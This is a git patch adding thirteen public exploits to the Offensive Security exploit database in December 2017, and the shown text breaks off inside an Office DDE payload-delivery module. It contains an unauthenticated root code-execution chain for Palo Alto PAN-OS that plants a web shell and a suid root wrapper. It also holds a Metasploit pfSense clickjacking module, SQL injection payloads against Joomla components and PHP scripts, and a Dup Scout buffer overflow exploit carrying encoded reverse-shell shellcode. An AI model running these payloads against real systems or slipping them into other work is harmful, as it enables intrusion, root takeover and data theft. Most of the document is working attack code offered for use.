From ed1c4edf3e49e20f299f34a916b7d5601197256b Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 15 Dec 2017 05:02:23 +0000 Subject: [PATCH] DB: 2017-12-15 13 changes to exploits/shellcodes Dup Scout Enterprise 10.0.18 - 'Input Directory' Local Buffer Overflow (SEH) Microsoft Office - DDE Payload Delivery (Metasploit) Dup Scout Enterprise - Login Buffer Overflow (Metasploit) pfSense 2.4.1 - CSRF Error Page Clickjacking (Metasploit) Palo Alto Networks Firewalls - Remote root Code Execution Joomla! Component JEXTN Question And Answer 3.1.0 - SQL Injection Joomla! Component JEXTN Video Gallery 3.0.5 - 'id' SQL Injection Readymade Video Sharing Script 3.2 - HTML Injection Paid To Read Script 2.0.5 - 'uid' / 'fnum' / 'fn' SQL Injection FS Lynda Clone 1.0 - SQL Injection Bus Booking Script 1.0 - 'txtname' SQL Injection Piwigo 2.9.1 - 'cat_true' / 'cat_false' SQL Injection Advantech WebAccess 8.2-2017.03.31 - Webvrpcs Service Opcode 80061 Stack Buffer Overflow (Metasploit) --- exploits/hardware/remote/43342.txt | 234 +++++++++++++++++++++++++++++ exploits/php/remote/43341.rb | 153 +++++++++++++++++++ exploits/php/webapps/43329.txt | 36 +++++ exploits/php/webapps/43330.txt | 27 ++++ exploits/php/webapps/43333.txt | 26 ++++ exploits/php/webapps/43334.txt | 39 +++++ exploits/php/webapps/43335.html | 29 ++++ exploits/php/webapps/43336.html | 29 ++++ exploits/php/webapps/43337.txt | 40 +++++ exploits/windows/remote/43202.py | 153 +++++++++++++++++++ exploits/windows/remote/43338.rb | 157 +++++++++++++++++++ exploits/windows/remote/43339.rb | 101 +++++++++++++ exploits/windows/webapps/43340.rb | 141 +++++++++++++++++ files_exploits.csv | 13 ++ 14 files changed, 1178 insertions(+) create mode 100644 exploits/hardware/remote/43342.txt create mode 100755 exploits/php/remote/43341.rb create mode 100644 exploits/php/webapps/43329.txt create mode 100644 exploits/php/webapps/43330.txt create mode 100644 exploits/php/webapps/43333.txt create mode 100644 exploits/php/webapps/43334.txt create mode 100644 exploits/php/webapps/43335.html create mode 100644 exploits/php/webapps/43336.html create mode 100644 exploits/php/webapps/43337.txt create mode 100755 exploits/windows/remote/43202.py create mode 100755 exploits/windows/remote/43338.rb create mode 100755 exploits/windows/remote/43339.rb create mode 100755 exploits/windows/webapps/43340.rb diff --git a/exploits/hardware/remote/43342.txt b/exploits/hardware/remote/43342.txt new file mode 100644 index 000000000..09e7a1832 --- /dev/null +++ b/exploits/hardware/remote/43342.txt @@ -0,0 +1,234 @@ +This is a public advisory for CVE-2017-15944 which is a remote root code +execution bug in Palo Alto Networks firewalls. + +Three separate bugs can be used together to remotely execute commands as +root through the web management interface without authentication on: PAN-OS +6.1.18 and earlier, PAN-OS 7.0.18 and earlier, PAN-OS 7.1.13 and earlier, +PAN-OS 8.0.5 and earlier. + +Palo Alto Networks recommends not exposing the web management interface to +the internet. By looking at Project Sonar or Shodan it is evident that it's +actually quite common to deploy the firewalls with the web management +interface listening on the WAN port. + +PAN-OS 6.1.19, PAN-OS 7.0.19, PAN-OS 7.1.14 and PAN-OS 8.0.6 are patched +and can be downloaded from https://support.paloaltonetworks.com/ + +=*=*=*=*=*=*=*=*= TIMELINE + +2017-07-09: Report submitted. + +2017-07-11: Palo Alto Networks PSIRT confirm that they received the report +and assign PDV-348 for tracking the issues. + +2017-12-05: The bugs are made public by Palo Alto Networks at +https://securityadvisories.paloaltonetworks.com + +2017-12-11: I send out this public advisory. + +=*=*=*=*=*=*=*=*= DESCRIPTION + +- Bug #1: Partial authentication bypass + +The file `/etc/appweb3/conf/common.conf` contains the web configuration for +the web server that handles the web management interface. + +It configures an authentication filter on most subdirectories using the +following format: + + + panAuthCheck on + + +This means that all requests to /php/* will be checked for an authenticated +session cookie. The functionality itself is implemented in the +`libpanApiWgetFilter.so` library file. + +The function `openAuthFilter()` will look for the PHPSESSID cookie and then +call the `readSessionVarsFromFile()` function on the session file to +extract the `dloc` and `user` values. + +The problem is that `readSessionVarsFromFile()` is not using the official +PHP functions to read the serialized session data, but its own parser using +`strtok()` which is not implemented correctly. + +The PHP session format which `readSessionVarsFromFile()` tries to parse +looks like this for string values: +locale|s:2:"en"; + +Explained: +var_name|s:str_length:"string value"; var_name|s:str_length:"another +string";... + + +If we can inject a value into the session file that contains the `";` +character sequence, we can break the parser and inject our own value for +the `user` variable. + +We can do this by calling the `/esp/cms_changeDeviceContext.esp` script, +which does not need any kind of authentication to be called. + +It will call the `panUserSetDeviceLocation()` function located in +`panmodule.so`, which splits the `dloc` GET parameter by ":" and sets the +`dloc` and `loc` session variables to the second value. + +We can corrupt the session file by calling the following url: +`/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337";` + +Which produces the following contents in `/tmp/sess_`: +`dloc|s:20:"8:a'";user|s."1337";";loc|s:27:"16:a'";user|s."1337";:vsys1";` + +When this is parsed by the `readSessionVarsFromFile()` function, it will +extract `16:a'` as the value for the `user` variable. + +It will then use this in XML requests to the backend to check if the user +is authenticated, but this produces an XML injection that results in an +invalid XML document: + +``` +Entity: line 1: parser error : attributes construct error + +``` + +The extra single quote character is injected into the cookie value, which +makes the request fail because of a parser error. Interestingly enough, the +`panCheckSessionExpired()` function in `libpanApiWgetFilter.so` does not +recognize this unexpected state and believes that authentication has +succeeded. + +We can now access any PHP file protected by the panAuthCheck directive +using our manipulated session cookie. + +Example: + +imac:~/pa% curl -H "Cookie: PHPSESSID=hacked;" 10.0.0.1/php/utils/debug.php + +Moved Temporarily +

Moved Temporarily

+

The document has moved here.

+
PanWeb Server/ - at 127.0.0.1:28250 Port 80
+ +imac:~/pa% curl -H "Cookie: PHPSESSID=hacked;" ' +10.0.0.1/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337";' +@start@Success@end@ +imac:~/pa% curl -H "Cookie: PHPSESSID=hacked;" 10.0.0.1/php/utils/debug.php +2>/dev/null|head -30 + + + + + Debug Console + + +It's important to note that we still don't have a valid, logged in session. +Most PHP scripts will fail, but we do bypass the authentication check in +the web server. + +- Bug #2: Arbitrary directory creation + +The `/php/utils/router.php` file handles API requests for the web +management interface backend communication. It exposes most of the PHP +classes that comprise the web application in a simple remote procedure call +interface over HTTP POST/JSON. + +The `/php/device/Administrator.php` file declares the `Administrator` +class. It contains a method called `get` that we can call from `router.php`. + +In the `get` method there is an XML injection in the call to +`Direct::getConfigByXpath`. The `jsonArgs->id` parameter is appended to the +request without any sanitation. This allows us to manipulate the XML +request that is sent to the backend. + +Normal request: + + +We can inject our own values into the end of the `obj` attribute, and +therefore control all of the remaining XML request. + +The `pan_cfg_req_ctxt_construct()` function in `libpanmp_mp.so` handles the +parsing of XML requests in the backend. + +If we send a request tag with the `async-mode='yes'` attribute set, the +backend will create a temporary file and parent directory in +`/opt/pancfg/session/pan/user_tmp//.xml` that contains +the output of the request. + +Since we can control the `` part of the created directory +structure, we can use a directory traversal attack to create a directory +with an arbitrary name anywhere on the system. + +For example, by sending the following crafted POST request: + +{"action":"PanDirect","method":"execute","data": +["07c5807d0d927dcd0980f86024e5208b","Administrator.get", +{"changeMyPassword":true,"template":"asd","id":"admin']\" +async-mode='yes' refresh='yes' +cookie='../../../../../../tmp/hacked'/>\u0000"}],"type":"rpc","tid":713} + + +The backend receives the following XML request, resulting in the +`/tmp/hacked` directory being created: + + + + +- Bug #3: Command injection in cron script + +There is a cron entry that executes `/usr/local/bin/genindex_batch.sh` +every 15 minutes. + +This shellscript will in turn execute `/usr/local/bin/genindex.sh` to +generate indexes from database files in `/opt/pancfg/mgmt/logdb/`. + +There is a command injection vulnerability in how this shellscript handles +filename processing: + + + +Since we can create directories in `$PAN_BASE_DIR/logdb/$dir/1`, we are +able to influence the output of the first `find` command. + +This output is then used as an argument in the second execution of `find`, +but without enclosing quotes. We can therefore inject arbitrary arguments +in this invocation. By passing the `-exec` option to `find`, we can make it +execute arbitrary system commands. + +My exploit creates a directory called: +`* -print -exec python -c exec("[base64 code..]".decode("base64")) ;` + +The base64-encoded python code will be executed as root, which creates a +simple web shell in `/var/appweb/htdocs/api/c.php` as well as a suid root +wrapper in `/bin/x`. + +=*=*=*=*=*=*=*=*= EXPLOIT OUTPUT + +imac:~/pa% python panos-rce.py http://10.0.0.1/ +creating corrupted session... +http://10.0.0.1/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27 +";user|s."1337"; +done, verifying.. +http://10.0.0.1/php/utils/debug.php +panAuthCheck bypassed +verifying that directory creation works.. +http://10.0.0.1/php/utils/router.php/Administrator.get +http://10.0.0.1/api/test/202.xml +creating /opt/pancfg/mgmt/logdb/traffic/1/ entry +shell at http://10.0.0.1/api/c.php should be created in 8 minutes.. please +wait + +web shell created, rootshell accessible with /bin/x -p -c 'command' +uid=99(nobody) gid=99(nobody) euid=0(root) +Linux PA-3060 2.6.32.27-7.1.10.0.30 #1 SMP Thu May 4 20:10:01 PDT 2017 +x86_64 x86_64 x86_64 GNU/Linux + +$ + + +=*=*=*=*=*=*=*=*= CREDIT + +Philip Pettersson \ No newline at end of file diff --git a/exploits/php/remote/43341.rb b/exploits/php/remote/43341.rb new file mode 100755 index 000000000..bbb7294dd --- /dev/null +++ b/exploits/php/remote/43341.rb @@ -0,0 +1,153 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpServer::HTML + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Clickjacking Vulnerability In CSRF Error Page pfSense', + 'Description' => %q{ + This module exploits a Clickjacking vulnerability in pfSense <= 2.4.1. + + pfSense is a free and open source firewall and router. It was found that the + pfSense WebGUI is vulnerable to Clickjacking. By tricking an authenticated admin + into interacting with a specially crafted webpage it is possible for an attacker + to execute arbitrary code in the WebGUI. Since the WebGUI runs as the root user, + this will result in a full compromise of the pfSense instance. + }, + 'Author' => 'Yorick Koster', + 'Payload' => { 'BadChars' => '"' }, + 'License' => MSF_LICENSE, + 'References' => + [ + ['URL', 'https://securify.nl/en/advisory/SFY20171101/clickjacking-vulnerability-in-csrf-error-page-pfsense.html'], + ['URL', 'https://doc.pfsense.org/index.php/2.4.2_New_Features_and_Changes'] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process' + }, + 'Arch' => ARCH_PHP, + 'Platform' => 'php', + 'Targets' => + [ + [ 'pfSense <= 2.4.1', { 'auto' => false } ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Nov 21 2017' + ) + ) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The base path to the web application', 'https://192.168.1.1']) + ] + ) + end + + def js_file + @js ||= lambda { + path = File.join(Msf::Config.data_directory, 'exploits', 'pfsense_clickjacking', 'cookieconsent.min.js') + return File.read(path) + }.call + end + + def css_file + @css ||= lambda { + path = File.join(Msf::Config.data_directory, 'exploits', 'pfsense_clickjacking', 'cookieconsent.min.css') + return File.read(path) + }.call + end + + def background_file + @background ||= lambda { + path = File.join(Msf::Config.data_directory, 'exploits', 'pfsense_clickjacking', 'background.jpg') + return File.read(path) + }.call + end + + def on_request_uri(cli, request) + print_status("GET #{request.uri} #{request.headers['User-Agent']}") + + resp = create_response(200, "OK") + if request.uri =~ /\.js$/ + resp.body = js_file + resp['Content-Type'] = 'text/javascript' + + elsif request.uri =~ /\.css$/ + resp.body = css_file + resp['Content-Type'] = 'text/css' + + elsif request.uri =~ /\.jpg$/ + resp.body = background_file + resp['Content-Type'] = 'image/jpg' + + else + if datastore['TARGETURI'].end_with? '/' + url = datastore['TARGETURI'] + 'diag_command.php' + else + url = datastore['TARGETURI'] + '/diag_command.php' + end + framename = rand_text_alpha(16) + divname = rand_text_alpha(16) + resp.body = %Q| + + + + + + + +
+ +
+
+
+ + + +
+
+ + +| + resp['Content-Type'] = 'text/html' + end + + cli.send_response(resp) + end +end \ No newline at end of file diff --git a/exploits/php/webapps/43329.txt b/exploits/php/webapps/43329.txt new file mode 100644 index 000000000..372153464 --- /dev/null +++ b/exploits/php/webapps/43329.txt @@ -0,0 +1,36 @@ +# # # # # +# Exploit Title: Joomla! Component JEXTN Question And Answer 3.1.0 - SQL Injection +# Dork: N/A +# Date: 13.12.2017 +# Vendor Homepage: http://jextn.com/ +# Software Link: https://extensions.joomla.org/extensions/extension/communication/question-a-answers/jextn-question-and-answer/ +# Version: 3.1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/index.php/en/component/jequestions/?view=tags&an=[SQL] +# +# %2dVerAyari'%20%2f*!06666UNION*%2f%20%2f*!06666SELECT*/%201%2c(SELECT%20GROUP_CONCAT(table_name%20SEPARATOR%200x3c62723e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_SCHEMA=DATABASE())%2c3%2c4%2c5%2c6%2c7%2c8%2c9%2c10%2c11%2c12%2c13%2c14%2c15%2c16%2c17%2c18%2c19%2c20%2c21%2c22%2c23%2c24%2c25%2d%2d%20%2d +# +# +# 2) +# +# +#
+# +# +#
+# +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43330.txt b/exploits/php/webapps/43330.txt new file mode 100644 index 000000000..ae3855e7a --- /dev/null +++ b/exploits/php/webapps/43330.txt @@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: Joomla! Component JEXTN Video Gallery 3.0.5 - SQL Injection +# Dork: N/A +# Date: 13.12.2017 +# Vendor Homepage: http://jextn.com/ +# Software Link: https://extensions.joomla.org/extensions/extension/multimedia/multimedia-players/jextn-video-gallery/ +# Version: 3.0.5 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/index.php?option=com_jevideogallery&view=category&id=99[SQL] +# +# 99%20AND(SELECT%201%20FROM%20(SELECT%20COUNT(*),CONCAT((SELECT(SELECT%20CONCAT(CAST(DATABASE()%20AS%20CHAR)%2c0x7e,0x496873616e53656e63616e))%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a) +# +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43333.txt b/exploits/php/webapps/43333.txt new file mode 100644 index 000000000..4dd19078d --- /dev/null +++ b/exploits/php/webapps/43333.txt @@ -0,0 +1,26 @@ +# # # # # +# Exploit Title: Readymade Video Sharing Script 3.2 - HTML Injection +# Dork: N/A +# Date: 13.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/php-video-sharing-script/ +# Demo: http://www.smsemailmarketing.in/demo/videosharing/ +# Version: 3.2 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-17649 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability implication allows an attacker to inject html code .... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/single-video-detail.php?video_id=MTMy&comment=[CODE]&comment_submit= +# +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43334.txt b/exploits/php/webapps/43334.txt new file mode 100644 index 000000000..abc944b27 --- /dev/null +++ b/exploits/php/webapps/43334.txt @@ -0,0 +1,39 @@ +# # # # # +# Exploit Title: Paid To Read Script 2.0.5 - SQL Injection +# Dork: N/A +# Date: 13.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/paid-to-read-script/ +# Version: 2.0.5 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-17651 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/admin/userview.php?uid=[SQL] +# +# -9++/*!08888UNION*/(/*!08888SELECT*/(1)%2c(2)%2c(3)%2c(4)%2c(5)%2c(6)%2c(7)%2c(8)%2c(9)%2c(10)%2c(11)%2c(12)%2c(13)%2c(14)%2c(15)%2c(16)%2c(17)%2c(18)%2c(19)%2c(20)%2c(21)%2c(22)%2c(23)%2c(24)%2c(25)%2c(26)%2c(27)%2c(28)%2c(29)%2c(30)%2c(31)%2c(32)%2c(33)%2c(34)%2c(35)%2c(36)%2c(37)%2c(38)%2c(39)%2c(40)%2c(41)%2c(42)%2c(43)%2c(44)%2c(45)%2c(46)%2c(47)%2c(48)%2c(/*!08888Select*/+export_set(5%2c@:=0%2c(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5%2cexport_set(5%2c@%2c/*!08888table_name*/%2c0x3c6c693e%2c2)%2c/*!08888column_name*/%2c0xa3a%2c2))%2c@%2c2))%2c(50)%2c(51)%2c(52)%2c(53)%2c(54)%2c(55)%2c(56)%2c(57)%2c(58)%2c(59)%2c(60)%2c(61)%2c(62)%2c(63)%2c(64)%2c(65)%2c(66)%2c(67)%2c(68))--+- +# +# +# 2) +# http://localhost/[PATH]/admin/viewemcamp.php?fnum=[SQL] +# +# -1++/*!08888UNION*/(/*!08888SELECT*/+0x253238253331253239%2cCONCAT_WS(0x203a20%2cUSER()%2cDATABASE()%2cVERSION())%2c0x253238253333253239%2c0x253238253334253239%2c0x253238253335253239%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239)--+- +# +# +# 3) +# http://localhost/[PATH]/admin/viewvisitcamp.php?fn=[SQL] +# +# -6++/*!50000UNION*/(/*!50000SELECT*/0x253238253331253239%2c0x253238253332253239%2c0x253238253333253239%2c0x253238253334253239%2cCONCAT_WS(0x203a20%2cUSER()%2cDATABASE()%2cVERSION())%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239%2c0x253238253331253331253239%2c0x253238253331253332253239%2c0x253238253331253333253239%2c0x253238253331253334253239)--+- +# +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43335.html b/exploits/php/webapps/43335.html new file mode 100644 index 000000000..cb54caf1a --- /dev/null +++ b/exploits/php/webapps/43335.html @@ -0,0 +1,29 @@ + + + +
+ + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/43336.html b/exploits/php/webapps/43336.html new file mode 100644 index 000000000..292e89baa --- /dev/null +++ b/exploits/php/webapps/43336.html @@ -0,0 +1,29 @@ + + + +
+ + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/43337.txt b/exploits/php/webapps/43337.txt new file mode 100644 index 000000000..95ab215d9 --- /dev/null +++ b/exploits/php/webapps/43337.txt @@ -0,0 +1,40 @@ +# # # # # +# Exploit Title: Piwigo <= 2.9.1 - 'cat_true'/'cat_false' SQL Injection +# Dork: N/A +# Date: 12.12.2017 +# Vendor Homepage: http://piwigo.org/ +# Software Link: http://piwigo.org/basics/downloads +# Version: <= 2.9.1 +# Category: Webapps +# Tested on: WiN7_x64/WIN10_X64 +# CVE: CVE-2017-10682 +# # # # # +# Exploit Author: Akityo +# Email: akityo@foxmail.com +# # # # # +# Description: +# +# SQL injection vulnerability in the administrative backend in Piwigo through 2.9.1 allows remote users to execute arbitrary SQL commands via the cat_false or cat_true parameter +# in the comments or status page to cat_options.php. +# +# +# # # # # +# Proof-of-Concent: +# +# POST /[path]/admin.php?page=cat_options§ion=status HTTP/1.1 +# Host: www.test.com +# Content-Length: 34 +# Cache-Control: max-age=0 +# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +# Upgrade-Insecure-Requests: 1 +# User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 +# Content-Type: application/x-www-form-urlencoded +# Accept-Encoding: gzip, deflate +# Accept-Language: zh-CN,zh;q=0.8 +# Cookie: null +# Connection: close +# +# cat_false%5B%5D=[payload here]&trueify=%C2%AB +# +# +# # # # # \ No newline at end of file diff --git a/exploits/windows/remote/43202.py b/exploits/windows/remote/43202.py new file mode 100755 index 000000000..cf413319f --- /dev/null +++ b/exploits/windows/remote/43202.py @@ -0,0 +1,153 @@ +#!/usr/bin/python +import struct + +######################################################################################################## +# Exploit Author: Miguel Mendez Z +# Exploit Title: Dup Scout Enterprise v10.0.18 "Input Directory" Local Buffer Overflow - SEH Unicode +# Date: 29-11-2017 +# Software: Dup Scout Enterprise +# Version: v10.0.18 +# Vendor Homepage: http://www.dupscout.com +# Software Link: http://www.dupscout.com/setups/dupscoutent_setup_v10.0.18.exe +# Tested on: Windows 7 x86 +######################################################################################################## + + +''' +[+] Paso 1 +Bytes Validos: +\x21\x23\x2a\x2b\x2d\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a +\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f +\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x61\x62\x63\x64\x65 +\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75 +\x76\x77\x78\x79\x7a +---------- +[+] Paso 2: +Align ESP: +popad * 49 +---------- +[+] Paso 3: +Assembly Align EAX: +xor eax,eax +push esp +pop eax +pop ecx +add eax 1c +jmp eax -----> (inicio shellcode) +---------- +[+] Paso 4: +Codificacion: +and eax,554E4D4A +and eax,2A313235 +sub eax,65656565 +sub eax,65654C65 +sub eax,54363176 +push eax +sub eax,33354D35 +sub eax,2A707737 +push eax + +Byte Paste: +254A4D4E55253532312A2D656565652D654C65652D76313654502D354D35332D3777702A50 +''' + +popad = "\x61"*49 +alignEsp = popad+( + "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31" + "\x2A\x2D\x65\x65\x65\x65\x2D\x65\x4C" + "\x65\x65\x2D\x76\x31\x36\x54\x50\x2D" + "\x35\x4D\x35\x33\x2D\x37\x77\x70\x2A" + "\x50" + ) + +''' +msfvenom -p windows/exec CMD=calc > calc.raw && ./alpha2 eax < calc.raw) +msfvenom -p windows/exec CMD=calc -e x86/alpha_mixed BufferRegister=EAX -f python +''' +shellcodeTest = ( + "PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8A" + "BuJIylIxNbWpwpwpQpMYyup1kp3TNk0PTpLKPRflLKv2uDnk" + "42uxtOoGaZwVea9oNLGL3QCLtBFLUpo1zoVmgqKwKRxrrrrw" + "LK62tPLKBjUlnk0LdQBXJCPHEQHQRqlK0YepwqN3lKRivxKS" + "wJaYLKTtLKvaXVvQKOLlKqhO6meQkw4xkP1ekFESqmxxWKam" + "7TBUKTBxNkchgTfaN3PfNkDLRklKshuLc1n3nk6dNk7qJpNi" + "QT14Q4aKSkSQV91JF1KOKPqO1O2zLKfrxknmqMrJS1LMNeoB" + "Wpgp5PpP58VQNk2Oow9oXUoKxpNUoRrvU8oVoeoMMMKOxUWL" + "eV3L4JMPKKKPrUTEoKswtSRRROcZePrsKOZu3SSQPlPcePA" + ) + +#msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 -e x86/alpha_mixed BufferRegister=EAX -f python +shellcode = "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +shellcode += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30" +shellcode += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" +shellcode += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" +shellcode += "\x4b\x4c\x79\x78\x6f\x72\x57\x70\x77\x70\x55\x50\x45" +shellcode += "\x30\x4d\x59\x49\x75\x46\x51\x4b\x70\x55\x34\x6e\x6b" +shellcode += "\x70\x50\x30\x30\x4e\x6b\x56\x32\x46\x6c\x6c\x4b\x66" +shellcode += "\x32\x46\x74\x6e\x6b\x62\x52\x44\x68\x34\x4f\x4f\x47" +shellcode += "\x73\x7a\x45\x76\x55\x61\x39\x6f\x4c\x6c\x47\x4c\x35" +shellcode += "\x31\x53\x4c\x35\x52\x44\x6c\x65\x70\x5a\x61\x58\x4f" +shellcode += "\x74\x4d\x45\x51\x6a\x67\x48\x62\x4b\x42\x46\x32\x62" +shellcode += "\x77\x4e\x6b\x51\x42\x62\x30\x4c\x4b\x70\x4a\x37\x4c" +shellcode += "\x6e\x6b\x32\x6c\x74\x51\x33\x48\x6a\x43\x71\x58\x66" +shellcode += "\x61\x6a\x71\x50\x51\x4e\x6b\x63\x69\x75\x70\x37\x71" +shellcode += "\x7a\x73\x4c\x4b\x52\x69\x45\x48\x58\x63\x54\x7a\x30" +shellcode += "\x49\x6e\x6b\x34\x74\x4e\x6b\x56\x61\x49\x46\x34\x71" +shellcode += "\x69\x6f\x4e\x4c\x6f\x31\x78\x4f\x54\x4d\x66\x61\x68" +shellcode += "\x47\x76\x58\x6d\x30\x72\x55\x48\x76\x74\x43\x63\x4d" +shellcode += "\x48\x78\x65\x6b\x31\x6d\x74\x64\x42\x55\x58\x64\x31" +shellcode += "\x48\x6c\x4b\x53\x68\x47\x54\x37\x71\x39\x43\x73\x56" +shellcode += "\x4e\x6b\x66\x6c\x72\x6b\x6c\x4b\x36\x38\x35\x4c\x43" +shellcode += "\x31\x38\x53\x6c\x4b\x35\x54\x4c\x4b\x67\x71\x58\x50" +shellcode += "\x4c\x49\x72\x64\x75\x74\x66\x44\x43\x6b\x63\x6b\x31" +shellcode += "\x71\x46\x39\x32\x7a\x32\x71\x79\x6f\x6b\x50\x43\x6f" +shellcode += "\x31\x4f\x50\x5a\x4c\x4b\x52\x32\x48\x6b\x6e\x6d\x31" +shellcode += "\x4d\x45\x38\x55\x63\x74\x72\x33\x30\x47\x70\x53\x58" +shellcode += "\x43\x47\x74\x33\x47\x42\x31\x4f\x63\x64\x70\x68\x62" +shellcode += "\x6c\x62\x57\x74\x66\x43\x37\x59\x6f\x58\x55\x4d\x68" +shellcode += "\x6e\x70\x55\x51\x33\x30\x53\x30\x55\x79\x59\x54\x53" +shellcode += "\x64\x56\x30\x53\x58\x56\x49\x4f\x70\x30\x6b\x33\x30" +shellcode += "\x49\x6f\x4a\x75\x62\x70\x66\x30\x72\x70\x42\x70\x51" +shellcode += "\x50\x52\x70\x71\x50\x46\x30\x53\x58\x58\x6a\x36\x6f" +shellcode += "\x79\x4f\x4b\x50\x59\x6f\x6e\x35\x6e\x77\x61\x7a\x56" +shellcode += "\x65\x72\x48\x71\x6f\x75\x50\x45\x50\x46\x61\x63\x58" +shellcode += "\x53\x32\x37\x70\x56\x65\x47\x49\x6f\x79\x4a\x46\x53" +shellcode += "\x5a\x74\x50\x66\x36\x33\x67\x50\x68\x6e\x79\x6e\x45" +shellcode += "\x54\x34\x31\x71\x6b\x4f\x78\x55\x4f\x75\x6f\x30\x64" +shellcode += "\x34\x56\x6c\x49\x6f\x50\x4e\x36\x68\x64\x35\x58\x6c" +shellcode += "\x43\x58\x6c\x30\x6f\x45\x4c\x62\x30\x56\x39\x6f\x59" +shellcode += "\x45\x35\x38\x73\x53\x70\x6d\x35\x34\x45\x50\x6e\x69" +shellcode += "\x49\x73\x70\x57\x56\x37\x73\x67\x56\x51\x39\x66\x31" +shellcode += "\x7a\x75\x42\x36\x39\x36\x36\x58\x62\x39\x6d\x31\x76" +shellcode += "\x49\x57\x52\x64\x46\x44\x75\x6c\x53\x31\x63\x31\x6e" +shellcode += "\x6d\x31\x54\x57\x54\x42\x30\x5a\x66\x35\x50\x62\x64" +shellcode += "\x30\x54\x42\x70\x76\x36\x33\x66\x30\x56\x31\x56\x71" +shellcode += "\x46\x50\x4e\x56\x36\x66\x36\x32\x73\x31\x46\x45\x38" +shellcode += "\x33\x49\x5a\x6c\x77\x4f\x6f\x76\x4b\x4f\x58\x55\x6d" +shellcode += "\x59\x4d\x30\x42\x6e\x53\x66\x33\x76\x59\x6f\x66\x50" +shellcode += "\x63\x58\x66\x68\x6d\x57\x77\x6d\x31\x70\x39\x6f\x49" +shellcode += "\x45\x4d\x6b\x48\x70\x38\x35\x4d\x72\x42\x76\x31\x78" +shellcode += "\x69\x36\x7a\x35\x6d\x6d\x4d\x4d\x59\x6f\x5a\x75\x37" +shellcode += "\x4c\x53\x36\x33\x4c\x44\x4a\x6f\x70\x59\x6b\x4b\x50" +shellcode += "\x54\x35\x56\x65\x6d\x6b\x43\x77\x72\x33\x62\x52\x30" +shellcode += "\x6f\x51\x7a\x37\x70\x32\x73\x4b\x4f\x59\x45\x41\x41" + +offset = shellcodeTest+"\x41"*(4144-len(shellcodeTest)) +nseh = "\x71\x20" # jno short 34 +nseh += "\x70\x20" # jo short 34 +seh = struct.pack(" 'Microsoft Office DDE Payload Delivery', + 'Description' => %q{ + This module generates an DDE command to place within + a word document, that when executed, will retrieve a HTA payload + via HTTP from an web server. + }, + 'Author' => 'mumbai', + 'License' => MSF_LICENSE, + 'DisclosureDate' => 'Oct 9 2017', + 'References' => [ + 